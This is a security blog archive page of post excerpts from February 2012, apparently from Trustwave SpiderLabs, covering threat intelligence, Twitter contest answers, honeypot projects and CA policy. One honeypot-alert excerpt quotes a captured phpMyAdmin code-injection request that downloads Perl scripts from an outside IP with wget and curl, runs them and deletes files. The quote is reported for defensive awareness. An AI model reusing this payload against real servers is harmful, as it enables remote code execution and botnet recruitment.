Showing 21 results for: February 2012 ×

PIG - Finding Your Target Without Saying a Word

You see blogs, talks, presentations, and tutorials on how to break into boxes all the time. These usually focus on techniques to find vulnerabilities, exploit them, pivot, rinse, and repeat. Sometimes we get so caught up in what we're sending...

SpiderLabs Threat Intelligence Program

So a lot of people have been asking me "What do you do at Trustwave?" and I tell them I am the Threat Intelligence Manager. People usually start to smile like that's some kind of joke, like I manage intelligence or something and then they realize I am serious and they get this puzzled look on their face because they don't really know what Threat intelligence really is.

[Honeypot Alert] phpMyAdmin Code Injection Attacks for Botnet Recruitment

Our web honeypots picked up the following attacks today: 62.149.12.62 - - [21/Feb/2012:04:25:55 -0600] "GET /mysql//config.sample.inc.php?eval=system('echo cd /tmp;wget http://199.115.228.9/vp.txt -O p2.txt;curl -O http://199.115.228.9/vp.txt; mv vp.txt d.txt;lyxn -DUMP http://199.115.228.9/vp.txt >p3.txt;perl d.txt; perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 404 226 "-" "curl/7.19.7...

Call for Assistance: OWASP Virtual Patching Survey

Identification of web application vulnerabilities is only half the battle with remediation efforts as the other. In an ideal world, application defects could be quickly fixed within the application's code and pushed out into production rapidly. Let's face the facts,...

#TWContest: The correct data aggregation technique is...

On Tuesday we posted our fifth question of the Trustwave 2012 Global Security Report Twitter Contest. The question was… "Jeopardy Style: This data aggregation attack technique obtains data while it is being processed or access by a system or application....

Trustwave SpiderLabs: My First Nine Days

I'll be honest; I don't think I really understood the breadth of Trustwaves offerings when I accepted the job. Sure they do a lot of PCI stuff but they are also a CA, do internal and external pen testing, code review, forensics, malware analysis, even physical security, and a ton of other stuff.

#TWContest: The top "origin" of attack is...

On Monday we posted our fourth question of the Trustwave 2012 Global Security Report Twitter Contest. The question was… "What was the top "origin" of attack as seen through Trustwave SpiderLabs investigations in 2011?" The answer is... "Unknown" or "Unknown...

Top Ten Web Protection Techniques of 2011

Top Ten Web Hacking Techniques of 2011 Every year the web security community votes on the top web hacking techniques for the past year. The techniques identified are normally innovative, scary and sometimes down right funny and they serve an...

#TWContest: The 7th most popular password is...

On Friday we posted our third question of the Trustwave 2012 Global Security Report Twitter Contest. The question was… "What was the 7th most popular password found during a Business Password Analysis of over 2M hashes by Trustwave SpiderLabs?" The...

#TWContest: The industry that ranked third is...

On Thursday we posted our second question of the Trustwave 2012 Global Security Report Twitter Contest. The question was… "Which industry ranked third in total number of breaches investigated by Trustwave SpiderLabs in 2011?" The answer is... "Hospitality" and was...

WASC Distributed Web Honeypots Project Update

As the WASC Distributed Web Honeypots Project Sponsor, we are excited to announce that we have officially launched the next phase of the project! If you would like to participate, please read below. Project Overview The goal of the Distributed...

[Honeypot Alert] Status Report for January 2012

Monthly Web Honeypot Status Report We have received a tremendous amount of positive feedback on our web-based honeypot alert blog posts. While we agree that this data is useful for raising awareness of individual attack details, we feel that what...

Clarifying The Trustwave CA Policy Update

We've seen a number of comments and questions on Twitter regarding a recent Trustwave CA Policy Update to our legal repository (https://ssl.trustwave.com/CA). This update discusses a subordinate root revocation. This is a proactive revocation, of the only certificate we issued...

Death to PDF!

SpiderLabs customers are frustrated with PDF reports: You can't search them You can't sort them You can't assign pieces of them You can't trend them PenTest Manager, the reporting tool used by Trustwave SpiderLabs to manage, track and report results...